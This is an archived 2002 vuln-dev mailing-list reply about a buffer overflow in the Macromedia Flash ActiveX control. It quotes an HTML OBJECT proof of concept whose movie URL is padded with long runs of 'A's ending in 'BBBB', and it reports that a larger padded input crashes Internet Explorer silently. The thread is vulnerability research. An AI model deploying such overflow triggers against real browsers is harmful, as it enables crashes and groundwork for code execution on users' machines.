Re: Macromedia Flash Activex Buffer overflow

From: MegaHz (megahz@megahz.org)
Date: 01/05/02

• Previous message: Syzop: "Re: trusting user-supplied data (was Re: FreeBSD Security AdvisoryFreeBSD-SA-02:23.stdio)"
• In reply to: Enrique A. Compań Gzz.: "Re: Macromedia Flash Activex Buffer overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: "MegaHz" <megahz@megahz.org>
To: Enrique A. Compań Gzz. <enrique@virtekweb.net>, <vuln-dev@securityfocus.com>
Date: Sat, 5 Jan 2002 21:30:25 +0200

what I got is a warning that explorer has to close, so the buffer overflow
is successfull

but what about if you put a buffer 10 times bigger of this one
there is a buffer overflow, obviously but, with no warnings, IE, it
just closes...

I made an html file which it's around 4MB big,

c'ya

/*
 * Andreas Constantinides (MegaHz)
 * Admin of cHp (www.cyhackportal.com)
 *
 */

> From: "Enrique A. Compań Gzz." <enrique@virtekweb.net>

> <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
> <PARAM NAME=movie
>
VALUE="http://AAA.AAAAAAAAAAAAAAA.AAA/AAAAAAAA.swf?AAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAABBBB">
> </OBJECT>

---

• Previous message: Syzop: "Re: trusting user-supplied data (was Re: FreeBSD Security AdvisoryFreeBSD-SA-02:23.stdio)"
• In reply to: Enrique A. Compań Gzz.: "Re: Macromedia Flash Activex Buffer overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(14)